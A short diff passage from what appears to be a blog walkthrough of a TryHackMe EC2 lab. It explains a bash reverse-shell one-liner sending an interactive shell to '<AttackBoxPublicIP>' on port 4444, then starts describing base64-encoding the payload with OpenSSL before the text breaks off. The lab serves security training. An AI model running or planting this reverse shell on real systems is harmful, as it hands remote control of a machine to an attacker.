halcyondream/halcyondream.github.io/_posts/2024-01-21-thm-ec2-walkthrough.md

 bash -i >& /dev/tcp/<AttackBoxPublicIP>/4444 0>&1
 ```

+Remember to replace `<AttackBoxPublicIp>` with your machine's public IP address.
+Also note that this payload will target port 4444.
+If needed or desired, you can replace this with another port, but remember to use the same one for the listener.

 Save it as *reverse-shell-native.txt*.
 Next, base64-encode the file.
 Since OpenSSL is available on *many* platforms, we can use that to encode its contents:

 ```